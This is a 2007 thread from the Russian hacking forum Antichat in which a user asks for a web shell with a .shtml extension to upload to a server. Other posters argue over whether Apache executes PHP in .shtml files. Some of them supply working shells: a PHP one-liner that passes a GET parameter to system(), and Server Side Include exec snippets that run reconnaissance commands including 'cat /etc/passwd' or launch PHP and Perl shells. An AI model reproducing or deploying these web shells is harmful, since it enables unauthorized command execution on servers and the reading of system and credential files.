Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   shell.shtml - надо (https://forum.antichat.xyz/showthread.php?t=47785)

nobi 28.08.2007 03:44
shell.shtml - надо
 
незнал где написать -решил тут
кароче надо шелл с разрешением shtml
когдато встречал!тока вот где его взять - хз
если есть у кого дайте плизз

guest3297 28.08.2007 09:37
))
надо пичсать на каком языке нужен шелл а не с каким раширением. берешь обычный php шелл и переименновываешь shtml, все зависит от настроек апача по умолчаеию он интерпритирует shtml как php.

groundhog 28.08.2007 10:00
[ cash ], да нуууууу? По умолчанию апач парсит shtml на предмет SSI и уж никак не на предмет кода PHP. Ты ещё скажи, что в html апач тоже по умолчанию вызывает PHP-обработчик.

The_HuliGun 28.08.2007 10:11
Цитата:
по умолчаеию он интерпритирует shtml как php.
Никогда такого не видел. Пробовал на локалхосте с настройками апача по умолчанию - результат нулевой.

Goudini 28.08.2007 17:00
Если это глобальный инклуд, то расширение не имеет значения, текст будет выполняться как php-code

groundhog 28.08.2007 17:14
Я поправлю - если это инклуд внутри файла, который будет интерпретироваться как нужный Mime тип на веб-сервере.

bul.666 28.08.2007 17:40
Вступлюсь за [ cash ] (заодно получу батарейку) =)))
Цитата:
все зависит от настроек апача по умолчаеию он интерпритирует shtml как php.
Он наверное забыл поставить "не" передсловом "интерпритирует", ведь незря он употребил фразу "все зависит от настроек апача"... =/ ХЗ

groundhog 28.08.2007 17:45
А я не буду вступаться... Кэш мне друг, но истина дороже...

Вот дословно что он написал:

Цитата:
надо пичсать на каком языке нужен шелл а не с каким раширением. берешь обычный php шелл и переименновываешь shtml, все зависит от настроек апача по умолчаеию он интерпритирует shtml как php.
То есть он явно сказал, переименуй PHP в SHTML и будет тебе счастье, подразумевая при это что SHTML будет парситься как PHP... Если бы он забыл НЕ, он бы не говорил переименовать PHP в SHTML... Ибо если это сделать при умолчательных настройках то код PHP вывалился бы plain текстом в окно браузера.

bul.666 28.08.2007 17:49
Цитата:
он бы не говорил переименовать PHP в SHTML...
Тем самым он имел ввиду, если при настройках апача shtml представляется как php, то можно просто поменять расширение...

zl0ba 28.08.2007 17:56
Тише тут! Человек попросил здесь дать ему шелл с расширением *.shtml, а Вы тут заладили типа гдето что то. Может он через upload залить хочет шелл.

bul.666 28.08.2007 18:09
Создай файл shell.shtml с таким содержанием:
Цитата:
<?php
system($_get['c']);
?>
и залей!

The_HuliGun 28.08.2007 18:13
2 bul.666: Извините, вы наркоман?
Здесь уже целый день обсуждают вопрос о том, что php код в файле с розширением .shtml выполнятся не будет, а вы все туда же палку гнете.

bul.666 28.08.2007 18:15
Цитата:
то php код в файле с розширением .shtml выполнятся не будет
мда... При нужной настройке апача - будет

SanyaX 28.08.2007 19:20
Вот тебе несколько шеллов.
Цитата:
<html>

<body>

<!--#exec cmd="id;uname -a;pwd;who;ls -la;last user;df -h;ps -aux;cat /etc/passwd;"-->

</body>

</html>
Цитата:
<html>

<body>

<!--#exec cmd="shell.php"-->

</body>

</html>
Цитата:
<html>

<body>

<!--#exec cmd="perl r57pws.pl"-->

</body>

</html>

sh-smoker 28.08.2007 20:50
Цитата:
Сообщение от nobi
незнал где написать -решил тут
кароче надо шелл с разрешением shtml
когдато встречал!тока вот где его взять - хз
если есть у кого дайте плизз
Для начала почитай исходники на сервере, если есть возможность, глянь на чем они написанны в действительности, а потом начинай подбирать шелл подходящий ;)

Spyder 28.08.2007 22:34
Цитата:
мда... При нужной настройке апача - будет
при нужной настройке и .mp3 будет выполнятся как php. По умолчанию shtml не выполнится как пшп, уж извните =\


Время: 06:26